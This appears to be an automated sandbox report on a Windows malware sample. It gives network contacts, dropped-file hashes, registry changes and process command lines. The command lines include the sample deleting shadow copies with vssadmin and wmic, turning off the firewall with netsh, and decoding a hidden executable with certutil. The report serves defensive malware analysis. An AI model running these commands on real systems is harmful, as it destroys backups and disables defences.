| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | 64.253.107.13.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| BE | 2.17.107.112:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 112.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| BE | 2.17.107.112:443 | www.bing.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| BE | 2.17.107.128:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 128.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | b82d5c0a5deeca2c89b8fd16911c11f1 |
| SHA1 | 99fea8c7d2781d6b13886ce8f50b1f4b9beac961 |
| SHA256 | 7e2f4567e9674aa2e0e170a42ae7011a295dbce5f449cf7cf778e3ff732bd9e5 |
| SHA512 | 1c3646bf08ceeefcd4d22d882803083da2049ac0a2ba935c94ab6a7bf0642dddf855d684f89e17e96544324699416c25e191ace1cd7b3c52853c8c2c69c8c185 |
C:\Users\Admin\AppData\Local\Temp\Image.bin
| MD5 | eb05f382514e1a62572f9afd06a0a50d |
| SHA1 | 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5 |
| SHA256 | 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9 |
| SHA512 | 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f |
C:\Users\Admin\AppData\Local\Temp\0.vbs
| MD5 | 5b2f4b19baac5325cbeae4d8024d064c |
| SHA1 | 4f109afc12cec097f003f1723c1da56940f69b8f |
| SHA256 | 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e |
| SHA512 | 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 84e76c4333a2e08f687b8cd18eed901e |
| SHA1 | 723033d08ec213f2fc8358b202e92734a873a117 |
| SHA256 | 15a7094f601c041e396c09c13148669121b3740d296003f7428cfe3e0c4bc030 |
| SHA512 | f0d6b8fd00ee2f133cb726b5726cc915dfad60a8149726e472b90b33fc31e9415215209eddffff0c86645b4e4e2c108041a91b7fafebe1958c89149e166a56e7 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | ce4b7fda2db2db095ebd6728b8878082 |
| SHA1 | 41a7af0010d162f0971dadae6506d33836a2e66b |
| SHA256 | 503f44c1d079ebd27f4ff70acc01d09b18836258b6a35ba68ec4087521dc3afe |
| SHA512 | f4d0fd7eea4824b6e62505940dd0a348545111723b432da572543699e62243d1c0cf087b49fbf3622fa31635e61f0a538e64a06e8987e6c9c1984b5db35c092f |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 3326820872eea8ff3eb2fdca6920a0d6 |
| SHA1 | 6cb64b5dc48b4e29b2f40f68250697964881887a |
| SHA256 | c8b13e87732c28675e6830404a613a7bce8e1570e81e46bdc62f2e6198c56432 |
| SHA512 | c40975c7e2b9a1be6af440b3059b20acc45dbd2d8260f496c86e79a7973a3a7f2c3ea3ee045f62f3c20f7dd56c44eec5ab25d04725cfb51e4e53f32630c2640f |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 267373976517f497713da6526f2a5919 |
| SHA1 | 7b0384a5cbc5ed3b6dd5bf6f35a69261ad89708c |
| SHA256 | 7595c53f65129cce5d83227f7d4175d3340aeb31ce13f04fa40fde5c695f921a |
| SHA512 | 0e4dd83d0bd2a3d7eb134242a4f913aa97547e69fcf0989f1c55446cd62673c3cc91c2868f77cf0f0dd3048e8c7c051fc03b1cb56f489f54a75070d71a9e1c75 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | ff919ef1b4964694a371969a0a8fdc03 |
| SHA1 | 794b2d5a72d9116001deb47cfdc1947469494d6b |
| SHA256 | fafe968b635719a9e69e81e3bfe5a9021c1b044991508db15df67e125c9bcf76 |
| SHA512 | d6458bfe62a41eee2a4e27567942b091f7373d1d70ad11796a0ce4b75764fe38870a9bbd86a886dc111ef21d9b8ecdaec086e58ff9fa6ef1d40830771c2204bd |
C:\Users\Admin\AppData\Local\Temp\Data.lp
| MD5 | c63727e7d32cd53e644d8ab3435778fa |
| SHA1 | 4f187b6d1a0839ffff7bcc69368b40ca007067b3 |
| SHA256 | 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00 |
| SHA512 | 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7 |
C:\Users\Admin\AppData\Local\Temp\KillWin.exe
| MD5 | 3713a4dfdfa399b20561aa8bcbea1b25 |
| SHA1 | 8109cb8e9e9c00fba74d456c1756799c72072989 |
| SHA256 | 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa |
| SHA512 | a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090 |
C:\Users\Admin\AppData\Local\Temp\22211_1823.bat
| MD5 | 71f2ece5d6de26f528ff0e1c9382f1c9 |
| SHA1 | 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e |
| SHA256 | 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01 |
| SHA512 | 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56 |
C:\Users\Admin\AppData\Local\Temp\m.vbs
| MD5 | cbaa7c6cb3c383b11dd691b316f2a91b |
| SHA1 | 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e |
| SHA256 | 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95 |
| SHA512 | fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 08:19
Reported
2024-06-26 08:22
Platform
win7-20240508-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Deletes shadow copies
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c00310000000000a858d38210204c6f63616c00380008000400efbea8588181a858d3822a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5200310000000000a8588181122041707044617461003c0008000400efbea8588181a85881812a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000016000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000a8587084100041646d696e00380008000400efbea8588181a85870842a00000030000000000004000000000000000000000000000000410064006d0069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a00310000000000da588242102054656d700000360008000400efbea8588181da5882422a000000ff010000000002000000000000000000000000000000540065006d007000000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7400310000000000a85881811100557365727300600008000400efbeee3a851aa85881812a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"
C:\Windows\system32\attrib.exe
attrib Admin-information.log +h
C:\Windows\explorer.exe
explorer .
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all/quiet
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\mode.com
mode con: cols=170 lines=45
C:\Windows\system32\certutil.exe
certutil -decode "Image.bin" "Wallpaper.jpeg"
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\timeout.exe
timeout /t 4
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\system32\certutil.exe
certutil -decode "Data.lp" "KillWin.exe"
C:\Windows\system32\wscript.exe
wscript "m.vbs"
Network
Files
memory/2592-0-0x00000000039A0000-0x00000000039B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 9882f66d29c98a9e62598f7ca6adec56 |
| SHA1 | 021f34f144313bd04a54bc38239d8e7dfb158631 |
| SHA256 | 3bf0cf94c3419071a6223cc64eefe598a96ddfea15fc3f15552b98e560b0a3bf |
| SHA512 | d4a4be97cf2e09006ba65f681f8e7aa00b4d6a0b0a6073c02fe1f90bd1717c3f09071e44f88c25070be84a17c512317c5c1e068b2f47a978cc78671c5c707421 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | e9ef8f6a7d04db16f1743173089d5a80 |
| SHA1 | 49182dd2d8c4ebde136473d6bae123c8035bdce4 |
| SHA256 | 6f6bb9b6a6d282981f42c22e37210bbd2d7cf1d9e69a4273cdf9d2a628efc749 |
| SHA512 | a0884f7e360cbca6a27fcba5155f7545decc450e85613bb4ad511ea7c6717cb067c60fbe1abde912fa2d4090ac520ab3ca6e26fd25812f427dceb91b82ade3e9 |
C:\Users\Admin\AppData\Local\Temp\Image.bin
| MD5 | eb05f382514e1a62572f9afd06a0a50d |
| SHA1 | 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5 |
| SHA256 | 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9 |
| SHA512 | 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f |
C:\Users\Admin\AppData\Local\Temp\TempData\Null.dll
| MD5 | 453468cc569708abb4fe3a00a475d096 |
| SHA1 | 4cf6be38a9589675cffd62316c0544abc66b1459 |
| SHA256 | 287b3124063720a50127e3a8bdde6b2f7c7e4432d90830de05b52ae14de78399 |
| SHA512 | e987c9a967262388e3815d0f10dd75a794f7862b01c69d58615c9c4deaea64647367d3461d910905915927ad0a3f90e0f573f60c51b83faa90df50511e656d46 |
C:\Users\Admin\AppData\Local\Temp\0.vbs
| MD5 | 5b2f4b19baac5325cbeae4d8024d064c |
| SHA1 | 4f109afc12cec097f003f1723c1da56940f69b8f |
| SHA256 | 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e |
| SHA512 | 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b |
C:\Users\Admin\AppData\Local\Temp\Wallpaper.jpeg
| MD5 | 1285cd98536d791db631ac4bbc4520b1 |
| SHA1 | c0cf2a608361742736fc886ee837c6a501cc1ed1 |
| SHA256 | 8f16b68a09fb1ac498e34054c6b31634a7fba08204678b19d449f617c303c674 |
| SHA512 | f67065feb33b555748e5e82dd8c2b3da4992d03eab7444481b8d060fd74a579859bbbbf6f8f37aeb6e267ab4594a2c4732e90b5e2cf2cec006191885359f8826 |
C:\Users\Admin\AppData\Local\Temp\Data.lp
| MD5 | c63727e7d32cd53e644d8ab3435778fa |
| SHA1 | 4f187b6d1a0839ffff7bcc69368b40ca007067b3 |
